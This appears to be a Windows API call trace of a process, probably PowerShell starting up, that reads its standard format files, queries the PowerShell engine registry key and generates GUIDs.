	[0726.846] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.846] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.846] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.846] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.847] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.847] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.847] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.848] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.848] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.848] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.849] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.849] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.849] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.850] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.850] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.850] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.851] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.851] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.851] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.852] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.852] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.852] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.853] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.853] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0726.853] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0xf37, lpOverlapped=0x0) returned 1
	[0726.854] ReadFile (in: hFile=0x308, lpBuffer=0x2d45697, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45697*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0726.854] ReadFile (in: hFile=0x308, lpBuffer=0x2d45ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2d45ff8*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0726.854] CloseHandle (hObject=0x308) returned 1
	[0726.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0726.854] SetErrorMode (uMode=0x1) returned 0x1
	[0726.855] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d1a0 | out: lpFileInformation=0x26d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0726.855] SetErrorMode (uMode=0x1) returned 0x1
	[0726.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0726.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x308) returned 0x0
	[0726.855] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d20c, lpData=0x0, lpcbData=0x26d208*=0x0 | out: lpType=0x26d20c*=0x1, lpData=0x0, lpcbData=0x26d208*=0x56) returned 0x0
	[0726.855] CoTaskMemAlloc (cb=0x5a) returned 0x1b890070
	[0726.855] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d1dc, lpData=0x1b890070, lpcbData=0x26d1d8*=0x56 | out: lpType=0x26d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d1d8*=0x56) returned 0x0
	[0726.855] CoTaskMemFree (pv=0x1b890070) 
	[0726.856] RegCloseKey (hKey=0x308) returned 0x0
	[0726.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0726.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0726.860] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x1ee56b79, Data2=0x3ed9, Data3=0x4b03, Data4=([0]=0x9b, [1]=0xd6, [2]=0x6a, [3]=0xb7, [4]=0x61, [5]=0xb2, [6]=0x34, [7]=0x16))) returned 0x0
	[0726.861] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x7f59237f, Data2=0xa4d7, Data3=0x47e5, Data4=([0]=0x9f, [1]=0x9c, [2]=0xd2, [3]=0x9a, [4]=0xf0, [5]=0xae, [6]=0x30, [7]=0x28))) returned 0x0
	[0728.534] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x4db52511, Data2=0x4d9b, Data3=0x4b68, Data4=([0]=0x9e, [1]=0x5f, [2]=0x8c, [3]=0xd0, [4]=0x7e, [5]=0xb7, [6]=0xa8, [7]=0xc4))) returned 0x0
	[0730.459] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xa2443cc6, Data2=0x4dc, Data3=0x4886, Data4=([0]=0xb6, [1]=0x65, [2]=0xb1, [3]=0xe1, [4]=0x79, [5]=0xc1, [6]=0x9b, [7]=0x5f))) returned 0x0
	[0730.461] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x120eda1, Data2=0x12ba, Data3=0x434c, Data4=([0]=0xb4, [1]=0xb1, [2]=0x73, [3]=0x16, [4]=0x1a, [5]=0x60, [6]=0x5e, [7]=0x72))) returned 0x0
	[0730.461] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x12d64913, Data2=0x708, Data3=0x48d5, Data4=([0]=0x81, [1]=0xbd, [2]=0xfa, [3]=0x7a, [4]=0x7e, [5]=0x8c, [6]=0x9c, [7]=0x7a))) returned 0x0
	[0730.463] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xa07adc0f, Data2=0x178a, Data3=0x46b9, Data4=([0]=0x82, [1]=0x62, [2]=0xe6, [3]=0xd1, [4]=0x85, [5]=0x69, [6]=0xa, [7]=0x1e))) returned 0x0
	[0730.464] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x494edd6f, Data2=0x1704, Data3=0x4201, Data4=([0]=0x96, [1]=0x24, [2]=0xe, [3]=0x5c, [4]=0x98, [5]=0x3f, [6]=0x3b, [7]=0xb9))) returned 0x0
	[0730.464] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x2b437ff2, Data2=0x1de1, Data3=0x437d, Data4=([0]=0xb6, [1]=0x10, [2]=0xfa, [3]=0x9c, [4]=0xd5, [5]=0x97, [6]=0x97, [7]=0x8a))) returned 0x0
	[0730.464] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xa44364fe, Data2=0xb4bd, Data3=0x446f, Data4=([0]=0x80, [1]=0xfc, [2]=0x60, [3]=0x29, [4]=0x18, [5]=0x1b, [6]=0x1f, [7]=0x3e))) returned 0x0
	[0730.465] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xfafd971a, Data2=0xb001, Data3=0x4d5b, Data4=([0]=0xb9, [1]=0x64, [2]=0xc2, [3]=0xe3, [4]=0xa6, [5]=0xba, [6]=0x7, [7]=0x8a))) returned 0x0
	[0730.465] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x667ae7b8, Data2=0xd19f, Data3=0x492d, Data4=([0]=0xae, [1]=0xab, [2]=0xb7, [3]=0x9, [4]=0xf0, [5]=0xce, [6]=0xff, [7]=0x41))) returned 0x0
	[0730.465] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xcf3071e2, Data2=0x36f0, Data3=0x415b, Data4=([0]=0xa9, [1]=0x89, [2]=0x7a, [3]=0xd4, [4]=0xd7, [5]=0x43, [6]=0x7e, [7]=0xc8))) returned 0x0
	[0730.465] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x944add77, Data2=0xb13d, Data3=0x4093, Data4=([0]=0xb6, [1]=0x49, [2]=0x14, [3]=0x39, [4]=0xe9, [5]=0xfe, [6]=0x6c, [7]=0x4e))) returned 0x0
	[0730.465] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x88cab639, Data2=0xe652, Data3=0x431b, Data4=([0]=0xba, [1]=0xdb, [2]=0x9e, [3]=0xd7, [4]=0x1a, [5]=0xf6, [6]=0xa6, [7]=0xb8))) returned 0x0
	[0730.479] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xa97ab9c4, Data2=0x1e3e, Data3=0x4a7f, Data4=([0]=0xa4, [1]=0x2, [2]=0xc0, [3]=0xf1, [4]=0x6e, [5]=0xd, [6]=0xa7, [7]=0xf0))) returned 0x0
	[0730.480] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xec42c977, Data2=0x8b0, Data3=0x4186, Data4=([0]=0x9a, [1]=0xd2, [2]=0x0, [3]=0xcc, [4]=0xb8, [5]=0xc, [6]=0x35, [7]=0xce))) returned 0x0
	[0730.481] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xbbd2d66d, Data2=0x780d, Data3=0x490e, Data4=([0]=0xa4, [1]=0x6f, [2]=0xf2, [3]=0x5b, [4]=0xe2, [5]=0xaf, [6]=0x76, [7]=0x6c))) returned 0x0
	[0730.481] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x9160c480, Data2=0x2b7c, Data3=0x4c70, Data4=([0]=0x9d, [1]=0x25, [2]=0x2d, [3]=0x30, [4]=0x9b, [5]=0xf4, [6]=0xc0, [7]=0x29))) returned 0x0
	[0730.481] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x7bc27f51, Data2=0x831e, Data3=0x4dc2, Data4=([0]=0xaa, [1]=0x42, [2]=0xc5, [3]=0x22, [4]=0x17, [5]=0x9f, [6]=0x59, [7]=0xfb))) returned 0x0
	[0730.481] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xd4eec35e, Data2=0xc1f5, Data3=0x47e7, Data4=([0]=0xba, [1]=0xc5, [2]=0x9e, [3]=0x37, [4]=0xf4, [5]=0xe1, [6]=0xa2, [7]=0x21))) returned 0x0
	[0730.483] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x65d4a80, Data2=0x31b7, Data3=0x48dc, Data4=([0]=0xaf, [1]=0xcc, [2]=0x46, [3]=0x81, [4]=0x2f, [5]=0xc5, [6]=0xeb, [7]=0xef))) returned 0x0
	[0730.483] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xa82df2ad, Data2=0x2e5a, Data3=0x4692, Data4=([0]=0xb7, [1]=0x3b, [2]=0x13, [3]=0x20, [4]=0x6b, [5]=0xe5, [6]=0x8a, [7]=0xe6))) returned 0x0
	[0730.483] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x7ba0043d, Data2=0xf4f9, Data3=0x4730, Data4=([0]=0x9f, [1]=0x86, [2]=0x5f, [3]=0xd4, [4]=0x11, [5]=0x37, [6]=0x14, [7]=0xce))) returned 0x0
	[0730.483] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xfbbaf3f, Data2=0xab4f, Data3=0x47f7, Data4=([0]=0x9c, [1]=0x7a, [2]=0x55, [3]=0x6a, [4]=0xb9, [5]=0x61, [6]=0x1e, [7]=0x9a))) returned 0x0
	[0730.484] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0730.484] GetFileType (hFile=0x308) returned 0x1
	[0730.484] SetErrorMode (uMode=0x1) returned 0x1
	[0730.484] GetFileType (hFile=0x308) returned 0x1
	[0730.484] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.485] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.485] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.485] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.486] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.486] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.486] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.486] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.486] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.489] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.489] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.490] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.490] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.490] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.491] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.491] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0730.491] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.270] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.271] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.271] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.271] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0732.272] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0xe67, lpOverlapped=0x0) returned 1
	[0732.272] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3297, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3297*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0732.272] ReadFile (in: hFile=0x308, lpBuffer=0x2ed3cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2ed3cc8*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0732.272] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x308) returned 0x0
	[0732.272] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d20c, lpData=0x0, lpcbData=0x26d208*=0x0 | out: lpType=0x26d20c*=0x1, lpData=0x0, lpcbData=0x26d208*=0x56) returned 0x0
	[0732.273] CoTaskMemAlloc (cb=0x5a) returned 0x1b890070
	[0732.273] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d1dc, lpData=0x1b890070, lpcbData=0x26d1d8*=0x56 | out: lpType=0x26d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d1d8*=0x56) returned 0x0
	[0732.273] CoTaskMemFree (pv=0x1b890070) 
	[0732.273] RegCloseKey (hKey=0x308) returned 0x0
	[0732.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0732.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0732.275] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xc0b3727f, Data2=0xc2ca, Data3=0x4c2f, Data4=([0]=0x86, [1]=0x70, [2]=0x69, [3]=0x62, [4]=0x1f, [5]=0xa4, [6]=0x58, [7]=0xf0))) returned 0x0
